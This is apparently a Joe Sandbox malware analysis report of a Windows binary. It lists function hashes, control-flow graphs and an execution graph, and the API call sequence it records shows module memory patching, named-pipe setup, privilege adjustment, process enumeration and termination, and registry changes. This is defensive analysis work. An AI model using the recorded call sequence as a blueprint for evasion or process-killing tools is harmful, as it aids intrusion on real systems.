                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • String ID: 0$X&$ 6
                                                                                • API String ID: 4088430540-2247980209
                                                                                • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                                • Instruction ID: 6464706ec75f28e0cc2e55cc68ee67327ebcf8e776d6be99e1f45bbb375e6e0e
                                                                                • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                                • Instruction Fuzzy Hash: 5152A461D2C78284F712AF25DC026F9E370EFA9348FC446B5D94C566A5EF3C6246CB28
                                                                                Function 00007FF72A7B11D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 3825114775-1582277970
                                                                                • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                                • Instruction ID: 1aa95dcb4a7f2c3ad12c2f9a0b632bd41443919b18459ffadd0fbae71156cf52
                                                                                • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                                • Instruction Fuzzy Hash: 7E414FA1A1D70284FB00BF19EC50779A761EFADB90F8448B6C91D437A6DF2CA4458F28
                                                                                Function 00007FF72A7B2690 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 322COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 597572034-2527496196
                                                                                • Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                                • Instruction ID: cb68824a13c651b0e50ad4c390ab5bb605be1f800bba7b516319b490f5f246cd
                                                                                • Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                                • Instruction Fuzzy Hash: 8E02DF62908B8181F720EF15EC057AAB7A0FBA97A4F804275DA9C437E5DF3CD145CB64
                                                                                Function 00007FF72A7B3352 Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 205COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 3623275624-1413854666
                                                                                • Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                                • Instruction ID: af7ffcc64a2aaeff43c96cadcae37548f729b7c28d63dc60697c4ff41118c4a0
                                                                                • Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                                • Instruction Fuzzy Hash: 25B18D6190C7C185F361AB24EC457BBB7A0FF94348F8041B5EA8952A95DF7CD18A8F24
                                                                                Function 00007FF72A7B1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF72A7BC8F4,00007FF72A7BC8F4,?,?,00007FF72A7B0000,?,00007FF72A7B1991), ref: 00007FF72A7B1C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF72A7BC8F4,00007FF72A7BC8F4,?,?,00007FF72A7B0000,?,00007FF72A7B1991), ref: 00007FF72A7B1CC7
                                                                                • memcpy.MSVCRT ref: 00007FF72A7B1CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF72A7BC8F4,00007FF72A7BC8F4,?,?,00007FF72A7B0000,?,00007FF72A7B1991), ref: 00007FF72A7B1D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                                • Instruction ID: b8bc439d6d996bf43212dbc73444870a9d053aae7a2546fffe745203b8fae2b0
                                                                                • Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                                • Instruction Fuzzy Hash: 864186A2A0874681FF51AF05DC446B9A760EF6DB80F9448B6CE0D437A1DE3CE589CB24
                                                                                Function 00007FF72A7B2104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 926137887-0
                                                                                • Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                                • Instruction ID: 40e9c2dd3c833dd7a2feb3c6380a03c82cabfa250f31eba72c77b4e270e60d04
                                                                                • Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                                • Instruction Fuzzy Hash: E721EA61A0E70681FB55BF11ED40678E260EF3DB90FD548B6C91D477A4DE2CA8428E68
                                                                                Function 00007FF72A7B1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 7ff72a7b1e10-7ff72a7b1e2d 317 7ff72a7b1e2f-7ff72a7b1e38 316->317 318 7ff72a7b1e3e-7ff72a7b1e48 316->318 317->318 321 7ff72a7b1f60-7ff72a7b1f69 317->321 319 7ff72a7b1ea3-7ff72a7b1ea8 318->319 320 7ff72a7b1e4a-7ff72a7b1e53 318->320 319->321 324 7ff72a7b1eae-7ff72a7b1eb3 319->324 322 7ff72a7b1e55-7ff72a7b1e60 320->322 323 7ff72a7b1ecc-7ff72a7b1ed1 320->323 322->319 327 7ff72a7b1f23-7ff72a7b1f2d 323->327 328 7ff72a7b1ed3-7ff72a7b1ee2 signal 323->328 325 7ff72a7b1eb5-7ff72a7b1eba 324->325 326 7ff72a7b1efb-7ff72a7b1f0a call 7ff72a7b9ff0 324->326 325->321 331 7ff72a7b1ec0 325->331 326->327 338 7ff72a7b1f0c-7ff72a7b1f10 326->338 329 7ff72a7b1f2f-7ff72a7b1f3f 327->329 330 7ff72a7b1f43-7ff72a7b1f45 327->330 328->327 332 7ff72a7b1ee4-7ff72a7b1ee8 328->332 329->330 330->321 331->327 334 7ff72a7b1eea-7ff72a7b1ef9 signal 332->334 335 7ff72a7b1f4e-7ff72a7b1f53 332->335 334->321 337 7ff72a7b1f5a 335->337 337->321 339 7ff72a7b1f12-7ff72a7b1f21 signal 338->339 340 7ff72a7b1f55 338->340 339->321 340->337
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction ID: 06b7c61e1fa93179adab152dfec5c0e72ea43191dbae683cd3a3879546e01c64
                                                                                • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction Fuzzy Hash: DD2105A1F0E30249FB747A149D803799181DFAD764FA889B1D91D433C4DF2CA88ACA68
                                                                                Function 00007FF72A7B38E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • String ID: 0$@
                                                                                • API String ID: 4088430540-1545510068
                                                                                • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction ID: 569bb9a685d4222d99c5bbbd4e53bac83cb77667e18bd9fe2b57ebc0090fd871
                                                                                • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction Fuzzy Hash: ED115C2252868186E350DF14F84579AF374EFE83A4F905124FA8D83B68EF7DC14ACB10
                                                                                Function 00007FF72A7B1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 349 7ff72a7b1880-7ff72a7b189c 350 7ff72a7b18a2-7ff72a7b18f9 call 7ff72a7b2420 call 7ff72a7b2660 349->350 351 7ff72a7b1a0f-7ff72a7b1a1f 349->351 350->351 356 7ff72a7b18ff-7ff72a7b1910 350->356 357 7ff72a7b1912-7ff72a7b191c 356->357 358 7ff72a7b193e-7ff72a7b1941 356->358 359 7ff72a7b194d-7ff72a7b1954 357->359 360 7ff72a7b191e-7ff72a7b1929 357->360 358->359 361 7ff72a7b1943-7ff72a7b1947 358->361 364 7ff72a7b1956-7ff72a7b1961 359->364 365 7ff72a7b199e-7ff72a7b19a6 359->365 360->359 362 7ff72a7b192b-7ff72a7b193a 360->362 361->359 363 7ff72a7b1a20-7ff72a7b1a26 361->363 362->358 366 7ff72a7b1b87-7ff72a7b1b98 call 7ff72a7b1d40 363->366 367 7ff72a7b1a2c-7ff72a7b1a37 363->367 368 7ff72a7b1970-7ff72a7b199c call 7ff72a7b1ba0 364->368 365->351 369 7ff72a7b19a8-7ff72a7b19c1 365->369 367->365 370 7ff72a7b1a3d-7ff72a7b1a5f 367->370 368->365 373 7ff72a7b19df-7ff72a7b19e7 369->373 376 7ff72a7b1a7d-7ff72a7b1a97 370->376 374 7ff72a7b19d0-7ff72a7b19dd 373->374 375 7ff72a7b19e9-7ff72a7b1a0d VirtualProtect 373->375 374->351 374->373 375->374 379 7ff72a7b1a70-7ff72a7b1a77 375->379 380 7ff72a7b1b74-7ff72a7b1b82 call 7ff72a7b1d40 376->380 381 7ff72a7b1a9d-7ff72a7b1afa 376->381 379->365 379->376 380->366 386 7ff72a7b1b22-7ff72a7b1b26 381->386 387 7ff72a7b1afc-7ff72a7b1b0e 381->387 386->379 390 7ff72a7b1b2c-7ff72a7b1b30 386->390 388 7ff72a7b1b10-7ff72a7b1b20 387->388 389 7ff72a7b1b5c-7ff72a7b1b6f call 7ff72a7b1d40 387->389 388->386 388->389 389->380 390->379 391 7ff72a7b1b36-7ff72a7b1b53 call 7ff72a7b1ba0 390->391 391->389
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A7B1247), ref: 00007FF72A7B19F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction ID: 4f83235bd2d6cd6702c5a6fe8154f97febba172ede71017a0ff7b863362fdee5
                                                                                • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction Fuzzy Hash: D3515FA1A08786C6FB10AF25DC447B9A761EB6DB94F8449B1DA1C07794CF3CE486CF24
                                                                                Function 00007FF72A7B1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 395 7ff72a7b1800-7ff72a7b1810 396 7ff72a7b1812-7ff72a7b1822 395->396 397 7ff72a7b1824 395->397 398 7ff72a7b182b-7ff72a7b1867 call 7ff72a7b2290 fprintf 396->398 397->398
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction ID: eedd1e36da1ec1aa5aef320f897762a0461a0c3c66298b4f3eb5d3bb959cea92
                                                                                • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction Fuzzy Hash: 07F0AF51A18B4982F320AF24AD410B9E360EBAD390F909A71EF4D92361DF2CE1828B14
                                                                                Function 00007FF72A7B219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction ID: 6217aae0b7602d2914434893f8ed24dca5674463c2cff2dd7fc4b21308776c51
                                                                                • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction Fuzzy Hash: 1B011261A0E70692F745BF11AD00178D220FF3CB90FC544B5C90D437A4DF2CA8528A68

                                                                                Execution Graph

                                                                                Execution Coverage:45.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:40.1%
                                                                                Total number of Nodes:227
                                                                                Total number of Limit Nodes:25
                                                                                execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap HeapFree GetProcessHeap HeapFree 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 